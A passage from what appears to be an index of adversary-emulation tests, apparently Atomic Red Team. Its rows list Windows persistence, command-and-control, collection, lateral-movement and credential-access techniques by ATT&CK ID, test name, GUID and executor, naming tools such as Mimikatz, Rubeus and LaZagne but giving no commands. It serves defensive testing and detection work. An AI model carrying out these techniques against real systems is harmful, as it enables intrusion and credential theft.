668 persistence T1098 Account Manipulation 15 Domain Password Policy Check: Only Two Character Classes 784d1349-5a26-4d20-af5e-d6af53bae460 powershell
669 persistence T1098 Account Manipulation 16 Domain Password Policy Check: Common Password Use 81959d03-c51f-49a1-bb24-23f1ec885578 powershell
670 persistence T1505.004 IIS Components 1 Install IIS Module using AppCmd.exe 53adbdfa-8200-490c-871c-d3b1ab3324b2 command_prompt
671 persistence T1505.004 IIS Components 2 Install IIS Module using PowerShell Cmdlet New-WebGlobalModule cc3381fb-4bd0-405c-a8e4-6cacfac3b06c powershell
672 persistence T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
673 persistence T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
674 persistence T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
675 persistence T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
676 persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
677 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
678 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
679 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
680 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
681 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
682 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
683 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
684 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
685 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
686 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
687 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
688 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
689 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
690 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
691 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
692 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence (HKCU) c3e35b58-fe1c-480b-b540-7600fb612563 powershell
693 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
694 persistence T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
695 persistence T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
696 persistence T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
697 persistence T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
698 persistence T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
699 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
700 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
701 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
702 command-and-control T1132.001 Data Encoding: Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
703 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
704 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
705 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
706 command-and-control T1071.004 Application Layer Protocol: DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
707 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
708 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
709 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
710 command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
711 command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
712 command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
| Tactic | Technique # | Technique Name | Test # | Test Name | Test GUID | Executor Name |
| --- | --- | --- | --- | --- | --- | --- |
| command-and-control | T1219 | Remote Access Software | 7 | RemotePC Software Execution | fbff3f1f-b0bf-448e-840f-7e1687affdce | powershell |
| command-and-control | T1219 | Remote Access Software | 8 | NetSupport - RAT Execution | ecca999b-e0c8-40e8-8416-ad320b146a75 | powershell |
| command-and-control | T1219 | Remote Access Software | 9 | UltraViewer - RAT Execution | 19acf63b-55c4-4b6a-8552-00a8865105c8 | powershell |
| command-and-control | T1219 | Remote Access Software | 10 | UltraVNC Execution | 42e51815-a6cc-4c75-b970-3f0ff54b610e | powershell |
| command-and-control | T1219 | Remote Access Software | 11 | MSP360 Connect Execution | b1b8128b-c5d4-4de9-bf70-e60419274562 | powershell |
| command-and-control | T1572 | Protocol Tunneling | 1 | DNS over HTTPS Large Query Volume | ae9ef4b0-d8c1-49d4-8758-06206f19af0a | powershell |
| command-and-control | T1572 | Protocol Tunneling | 2 | DNS over HTTPS Regular Beaconing | 0c5f9705-c575-42a6-9609-cbbff4b2fc9b | powershell |
| command-and-control | T1572 | Protocol Tunneling | 3 | DNS over HTTPS Long Domain Query | 748a73d5-cea4-4f34-84d8-839da5baa99c | powershell |
| command-and-control | T1090.003 | Proxy: Multi-hop Proxy | 1 | Psiphon | 14d55ca0-920e-4b44-8425-37eedd72b173 | powershell |
| command-and-control | T1090.003 | Proxy: Multi-hop Proxy | 2 | Tor Proxy Usage - Windows | 7b9d85e5-c4ce-4434-8060-d3de83595e69 | powershell |
| command-and-control | T1571 | Non-Standard Port | 1 | Testing usage of uncommonly used port with PowerShell | 21fe622f-8e53-4b31-ba83-6d333c2583f4 | powershell |
| command-and-control | T1573 | Encrypted Channel | 1 | OpenSSL C2 | 21caf58e-87ad-440c-a6b8-3ac259964003 | powershell |
| command-and-control | T1095 | Non-Application Layer Protocol | 1 | ICMP C2 | 0268e63c-e244-42db-bef7-72a9e59fc1fc | powershell |
| command-and-control | T1095 | Non-Application Layer Protocol | 2 | Netcat C2 | bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 | powershell |
| command-and-control | T1095 | Non-Application Layer Protocol | 3 | Powercat C2 | 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e | powershell |
| command-and-control | T1071.001 | Application Layer Protocol: Web Protocols | 1 | Malicious User Agents - Powershell | 81c13829-f6c9-45b8-85a6-053366d55297 | powershell |
| command-and-control | T1071.001 | Application Layer Protocol: Web Protocols | 2 | Malicious User Agents - CMD | dc3488b0-08c7-4fea-b585-905c83b48180 | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 7 | certutil download (urlcache) | dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 8 | certutil download (verifyctl) | ffd492e3-0455-4518-9fb1-46527c9f241b | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 9 | Windows - BITSAdmin BITS Download | a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 10 | Windows - PowerShell Download | 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 11 | OSTAP Worming Activity | 2ca61766-b456-4fcf-a35a-1233685e1cad | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 12 | svchost writing a file to a UNC path | fa5a2759-41d7-4e13-a19c-e8f28a53566f | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 13 | Download a File with Windows Defender MpCmdRun.exe | 815bef8b-bf91-4b67-be4c-abe4c2a94ccc | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 15 | File Download via PowerShell | 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 16 | File download with finger.exe on Windows | 5f507e45-8411-4f99-84e7-e38530c45d01 | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 17 | Download a file with IMEWDBLD.exe | 1a02df58-09af-4064-a765-0babe1a0d1e2 | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 18 | Curl Download File | 2b080b99-0deb-4d51-af0f-833d37c4ca6a | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 19 | Curl Upload File | 635c9a38-6cbf-47dc-8615-3810bc1167cf | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 20 | Download a file with Microsoft Connection Manager Auto-Download | d239772b-88e2-4a2e-8473-897503401bcc | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 21 | MAZE Propagation Script | 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf | powershell |
| command-and-control | T1105 | Ingress Tool Transfer | 22 | Printer Migration Command-Line Tool UNC share folder into a zip file | 49845fc1-7961-4590-a0f0-3dbcf065ae7e | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 23 | Lolbas replace.exe use to copy file | 54782d65-12f0-47a5-b4c1-b70ee23de6df | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 24 | Lolbas replace.exe use to copy UNC file | ed0335ac-0354-400c-8148-f6151d20035a | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 25 | certreq download | 6fdaae87-c05b-42f8-842e-991a74e8376b | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 26 | Download a file using wscript | 97116a3f-efac-4b26-8336-b9cb18c45188 | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 28 | Nimgrab - Transfer Files | b1729c57-9384-4d1c-9b99-9b220afb384e | command_prompt |
| command-and-control | T1105 | Ingress Tool Transfer | 29 | iwr or Invoke Web-Request download | c01cad7f-7a4c-49df-985e-b190dcf6a279 | command_prompt |
| command-and-control | T1090.001 | Proxy: Internal Proxy | 3 | portproxy reg key | b8223ea9-4be2-44a6-b50a-9657a3d4e72a | powershell |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 1 | Compress Data for Exfiltration With Rar | 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 | command_prompt |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 2 | Compress Data and lock with password for Exfiltration with winrar | 8dd61a55-44c6-43cc-af0c-8bdda276860c | command_prompt |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 3 | Compress Data and lock with password for Exfiltration with winzip | 01df0353-d531-408d-a0c5-3161bf822134 | command_prompt |
| collection | T1560.001 | Archive Collected Data: Archive via Utility | 4 | Compress Data and lock with password for Exfiltration with 7zip | d1334303-59cb-4a03-8313-b3e24d02c198 | command_prompt |
| collection | T1113 | Screen Capture | 5 | Windows Screencapture | 3c898f62-626c-47d5-aad2-6de873d69153 | powershell |
| collection | T1113 | Screen Capture | 6 | Windows Screen Capture (CopyFromScreen) | e9313014-985a-48ef-80d9-cde604ffc187 | powershell |
| collection | T1056.001 | Input Capture: Keylogging | 1 | Input Capture | d9b633ca-8efb-45e6-b838-70f595c6ae26 | powershell |
| collection | T1123 | Audio Capture | 1 | using device audio capture commandlet | 9c3ad250-b185-4444-b5a9-d69218a10c95 | powershell |
| collection | T1123 | Audio Capture | 2 | Registry artefact when application use microphone | 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a | command_prompt |
| collection | T1074.001 | Data Staged: Local Data Staging | 1 | Stage data from Discovery.bat | 107706a5-6f9f-451a-adae-bab8c667829f | powershell |
| collection | T1074.001 | Data Staged: Local Data Staging | 3 | Zip a Folder with PowerShell for Staging in Temp | a57fbe4b-3440-452a-88a7-943531ac872a | powershell |
| collection | T1114.001 | Email Collection: Local Email Collection | 1 | Email Collection with PowerShell Get-Inbox | 3f1b5096-0139-4736-9b78-19bcb02bb1cb | powershell |
| collection | T1119 | Automated Collection | 1 | Automated Collection Command Prompt | cb379146-53f1-43e0-b884-7ce2c635ff5b | command_prompt |
| collection | T1119 | Automated Collection | 2 | Automated Collection PowerShell | 634bd9b9-dc83-4229-b19f-7f83ba9ad313 | powershell |
| collection | T1119 | Automated Collection | 3 | Recon information for export with PowerShell | c3f6d794-50dd-482f-b640-0384fbb7db26 | powershell |
| collection | T1119 | Automated Collection | 4 | Recon information for export with Command Prompt | aa1180e2-f329-4e1e-8625-2472ec0bfaf3 | command_prompt |
| collection | T1115 | Clipboard Data | 1 | Utilize Clipboard to store or execute commands from | 0cd14633-58d4-4422-9ede-daa2c9474ae7 | command_prompt |
| collection | T1115 | Clipboard Data | 2 | Execute Commands from Clipboard using PowerShell | d6dc21af-bec9-4152-be86-326b6babd416 | powershell |
| collection | T1115 | Clipboard Data | 4 | Collect Clipboard Data via VBA | 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 | powershell |
| collection | T1560 | Archive Collected Data | 1 | Compress Data for Exfiltration With PowerShell | 41410c60-614d-4b9d-b66e-b0192dd9c597 | powershell |
| collection | T1557.001 | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | 1 | LLMNR Poisoning with Inveigh (PowerShell) | deecd55f-afe0-4a62-9fba-4d1ba2deb321 | powershell |
| collection | T1125 | Video Capture | 1 | Registry artefact when application use webcam | 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a | command_prompt |
| collection | T1056.002 | Input Capture: GUI Input Capture | 2 | PowerShell - Prompt User for Password | 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 | powershell |
| collection | T1039 | Data from Network Shared Drive | 1 | Copy a sensitive File over Administrative share with copy | 6ed67921-1774-44ba-bac6-adb51ed60660 | command_prompt |
| collection | T1039 | Data from Network Shared Drive | 2 | Copy a sensitive File over Administrative share with Powershell | 7762e120-5879-44ff-97f8-008b401b9a98 | powershell |
| collection | T1056.004 | Input Capture: Credential API Hooking | 1 | Hook PowerShell TLS Encrypt/Decrypt Messages | de1934ea-1fbf-425b-8795-65fb27dd7e33 | powershell |
| lateral-movement | T1091 | Replication Through Removable Media | 1 | USB Malware Spread Simulation | d44b7297-622c-4be8-ad88-ec40d7563c75 | powershell |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 1 | Map admin share | 3386975b-367a-4fbb-9d77-4dcf3639ffd3 | command_prompt |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 2 | Map Admin Share PowerShell | 514e9cd7-9207-4882-98b1-c8f791bae3c5 | powershell |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 3 | Copy and Execute File with PsExec | 0eb03d41-79e4-4393-8e57-6344856be1cf | command_prompt |
| lateral-movement | T1021.002 | Remote Services: SMB/Windows Admin Shares | 4 | Execute command writing output to local Admin Share | d41aaab5-bdfe-431d-a3d5-c29e9136ff46 | command_prompt |
| lateral-movement | T1021.006 | Remote Services: Windows Remote Management | 1 | Enable Windows Remote Management | 9059e8de-3d7d-4954-a322-46161880b9cf | powershell |
| lateral-movement | T1021.006 | Remote Services: Windows Remote Management | 2 | Remote Code Execution with PS Credentials Using Invoke-Command | 5295bd61-bd7e-4744-9d52-85962a4cf2d6 | powershell |
| lateral-movement | T1021.006 | Remote Services: Windows Remote Management | 3 | WinRM Access with Evil-WinRM | efe86d95-44c4-4509-ae42-7bfd9d1f5b3d | powershell |
| lateral-movement | T1021.003 | Remote Services: Distributed Component Object Model | 1 | PowerShell Lateral Movement using MMC20 | 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 | powershell |
| lateral-movement | T1550.003 | Use Alternate Authentication Material: Pass the Ticket | 1 | Mimikatz Kerberos Ticket Attack | dbf38128-7ba7-4776-bedf-cc2eed432098 | command_prompt |
| lateral-movement | T1550.003 | Use Alternate Authentication Material: Pass the Ticket | 2 | Rubeus Kerberos Pass The Ticket | a2fc4ec5-12c6-4fb4-b661-961f23f359cb | powershell |
| lateral-movement | T1072 | Software Deployment Tools | 1 | Radmin Viewer Utility | b4988cad-6ed2-434d-ace5-ea2670782129 | command_prompt |
| lateral-movement | T1072 | Software Deployment Tools | 2 | PDQ Deploy RAT | e447b83b-a698-4feb-bed1-a7aaf45c3443 | command_prompt |
| lateral-movement | T1563.002 | Remote Service Session Hijacking: RDP Hijacking | 1 | RDP hijacking | a37ac520-b911-458e-8aed-c5f1576d9f46 | command_prompt |
| lateral-movement | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 1 | Mimikatz Pass the Hash | ec23cef9-27d9-46e4-a68d-6f75f7b86908 | command_prompt |
| lateral-movement | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 2 | crackmapexec Pass the Hash | eb05b028-16c8-4ad8-adea-6f5b219da9a9 | command_prompt |
| lateral-movement | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 3 | Invoke-WMIExec Pass the Hash | f8757545-b00a-4e4e-8cfb-8cfb961ee713 | powershell |
| lateral-movement | T1021.001 | Remote Services: Remote Desktop Protocol | 1 | RDP to DomainController | 355d4632-8cb9-449d-91ce-b566d0253d3e | powershell |
| lateral-movement | T1021.001 | Remote Services: Remote Desktop Protocol | 2 | Changing RDP Port to Non Standard Port via Powershell | 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 | powershell |
| lateral-movement | T1021.001 | Remote Services: Remote Desktop Protocol | 3 | Changing RDP Port to Non Standard Port via Command_Prompt | 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 | command_prompt |
| credential-access | T1056.001 | Input Capture: Keylogging | 1 | Input Capture | d9b633ca-8efb-45e6-b838-70f595c6ae26 | powershell |
| credential-access | T1110.001 | Brute Force: Password Guessing | 1 | Brute Force Credentials of single Active Directory domain users via SMB | 09480053-2f98-4854-be6e-71ae5f672224 | command_prompt |
| credential-access | T1110.001 | Brute Force: Password Guessing | 2 | Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) | c2969434-672b-4ec8-8df0-bbb91f40e250 | powershell |
| credential-access | T1110.001 | Brute Force: Password Guessing | 4 | Password Brute User using Kerbrute Tool | 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 | powershell |
| credential-access | T1003 | OS Credential Dumping | 1 | Gsecdump | 96345bfc-8ae7-4b6a-80b7-223200f24ef9 | command_prompt |
| credential-access | T1003 | OS Credential Dumping | 2 | Credential Dumping with NPPSpy | 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 | powershell |
| credential-access | T1003 | OS Credential Dumping | 3 | Dump svchost.exe to gather RDP credentials | d400090a-d8ca-4be0-982e-c70598a23de9 | powershell |
| credential-access | T1003 | OS Credential Dumping | 4 | Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) | 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 | powershell |
| credential-access | T1003 | OS Credential Dumping | 5 | Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) | 42510244-5019-48fa-a0e5-66c3b76e6049 | powershell |
| credential-access | T1003 | OS Credential Dumping | 6 | Dump Credential Manager using keymgr.dll and rundll32.exe | 84113186-ed3c-4d0d-8a3c-8980c86c1f4a | powershell |
| credential-access | T1539 | Steal Web Session Cookie | 1 | Steal Firefox Cookies (Windows) | 4b437357-f4e9-4c84-9fa6-9bcee6f826aa | powershell |
| credential-access | T1539 | Steal Web Session Cookie | 2 | Steal Chrome Cookies (Windows) | 26a6b840-4943-4965-8df5-ef1f9a282440 | powershell |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 1 | Registry dump of SAM, creds, and secrets | 5c2571d0-1572-416d-9676-812e64ca9f44 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 2 | Registry parse with pypykatz | a96872b2-cbf3-46cf-8eb4-27e8c0e85263 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 3 | esentutl.exe SAM copy | a90c2f4d-6726-444e-99d2-a00cd7c20480 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 4 | PowerDump Hashes and Usernames from Registry | 804f28fc-68fc-40da-b5a2-e9d0bce5c193 | powershell |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 5 | dump volume shadow copy hives with certutil | eeb9751a-d598-42d3-b11c-c122d9c3f6c7 | command_prompt |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 6 | dump volume shadow copy hives with System.IO.File | 9d77fed7-05f8-476e-a81b-8ff0472c64d0 | powershell |
| credential-access | T1003.002 | OS Credential Dumping: Security Account Manager | 7 | WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes | 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb | powershell |
| credential-access | T1110.002 | Brute Force: Password Cracking | 1 | Password Cracking with Hashcat | 6d27df5d-69d4-4c91-bc33-5983ffe91692 | command_prompt |
| credential-access | T1003.004 | OS Credential Dumping: LSA Secrets | 1 | Dumping LSA Secrets | 55295ab0-a703-433b-9ca4-ae13807de12f | command_prompt |
| credential-access | T1040 | Network Sniffing | 3 | Packet Capture Windows Command Prompt | a5b2f6a0-24b4-493e-9590-c699f75723ca | command_prompt |
| credential-access | T1040 | Network Sniffing | 4 | Windows Internal Packet Capture | b5656f67-d67f-4de8-8e62-b5581630f528 | command_prompt |
| credential-access | T1040 | Network Sniffing | 5 | Windows Internal pktmon capture | c67ba807-f48b-446e-b955-e4928cd1bf91 | command_prompt |
| credential-access | T1040 | Network Sniffing | 6 | Windows Internal pktmon set filter | 855fb8b4-b8ab-4785-ae77-09f5df7bff55 | command_prompt |
| credential-access | T1552.002 | Unsecured Credentials: Credentials in Registry | 1 | Enumeration for Credentials in Registry | b6ec082c-7384-46b3-a111-9a9b8b14e5e7 | command_prompt |
| credential-access | T1552.002 | Unsecured Credentials: Credentials in Registry | 2 | Enumeration for PuTTY Credentials in Registry | af197fd7-e868-448e-9bd5-05d1bcd9d9e5 | command_prompt |
| credential-access | T1556.002 | Modify Authentication Process: Password Filter DLL | 1 | Install and Register Password Filter DLL | a7961770-beb5-4134-9674-83d7e1fa865c | powershell |
| credential-access | T1558.004 | Steal or Forge Kerberos Tickets: AS-REP Roasting | 1 | Rubeus asreproast | 615bd568-2859-41b5-9aed-61f6a88e48dd | powershell |
| credential-access | T1558.004 | Steal or Forge Kerberos Tickets: AS-REP Roasting | 2 | Get-DomainUser with PowerView | d6139549-7b72-4e48-9ea1-324fc9bdf88a | powershell |
| credential-access | T1558.004 | Steal or Forge Kerberos Tickets: AS-REP Roasting | 3 | WinPwn - PowerSharpPack - Kerberoasting Using Rubeus | 8c385f88-4d47-4c9a-814d-93d9deec8c71 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 1 | Extract Windows Credential Manager via VBA | 234f9b7c-b53d-4f32-897b-b880a6c9ea7b | powershell |
| credential-access | T1555 | Credentials from Password Stores | 2 | Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] | c89becbe-1758-4e7d-a0f4-97d2188a23e3 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 3 | Dump credentials from Windows Credential Manager With PowerShell [web Credentials] | 8fd5a296-6772-4766-9991-ff4e92af7240 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 4 | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] | 36753ded-e5c4-4eb5-bc3c-e8fba236878d | powershell |
| credential-access | T1555 | Credentials from Password Stores | 5 | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] | bc071188-459f-44d5-901a-f8f2625b2d2e | powershell |
| credential-access | T1555 | Credentials from Password Stores | 6 | WinPwn - Loot local Credentials - lazagne | 079ee2e9-6f16-47ca-a635-14efcd994118 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 7 | WinPwn - Loot local Credentials - Wifi Credentials | afe369c2-b42e-447f-98a3-fb1f4e2b8552 | powershell |
| credential-access | T1555 | Credentials from Password Stores | 8 | WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords | db965264-3117-4bad-b7b7-2523b7856b92 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 1 | Run Chrome-password Collector | 8c05b133-d438-47ca-a630-19cc464c4622 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 3 | LaZagne - Credentials from Browser | 9a2915b3-3954-4cce-8c76-00fbf4dbd014 | command_prompt |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 4 | Simulating access to Chrome Login Data | 3d111226-d09a-4911-8715-fe11664f960d | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 5 | Simulating access to Opera Login Data | 28498c17-57e4-495a-b0be-cc1e36de408b | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 6 | Simulating access to Windows Firefox Login Data | eb8da98a-2e16-4551-b3dd-83de49baa14c | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 7 | Simulating access to Windows Edge Login Data | a6a5ec26-a2d1-4109-9d35-58b867689329 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 8 | Decrypt Mozilla Passwords with Firepwd.py | dc9cd677-c70f-4df5-bd1c-f114af3c2381 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 10 | Stage Popular Credential Files for Exfiltration | f543635c-1705-42c3-b180-efd6dc6e7ee7 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 11 | WinPwn - BrowserPwn | 764ea176-fb71-494c-90ea-72e9d85dce76 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 12 | WinPwn - Loot local Credentials - mimi-kittenz | ec1d0b37-f659-4186-869f-31a554891611 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 13 | WinPwn - PowerSharpPack - Sharpweb for Browser Credentials | e5e3d639-6ea8-4408-9ecd-d5a286268ca0 | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 15 | WebBrowserPassView - Credentials from Browser | e359627f-2d90-4320-ba5e-b0f878155bbe | powershell |
| credential-access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | 16 | BrowserStealer (Chrome / Firefox / Microsoft Edge) | 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 1 | Private Keys | 520ce462-7ca7-441e-b5a5-f8347f632696 | command_prompt |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 6 | ADFS token signing and encryption certificates theft - Local | 78e95057-d429-4e66-8f82-0f060c1ac96f | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 7 | ADFS token signing and encryption certificates theft - Remote | cab413d8-9e4a-4b8d-9b84-c985bd73a442 | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 8 | CertUtil ExportPFX | 336b25bf-4514-4684-8924-474974f28137 | powershell |
| credential-access | T1552.004 | Unsecured Credentials: Private Keys | 9 | Export Root Certificate with Export-PFXCertificate | 7617f689-bbd8-44bc-adcd-6f8968897848 | powershell |
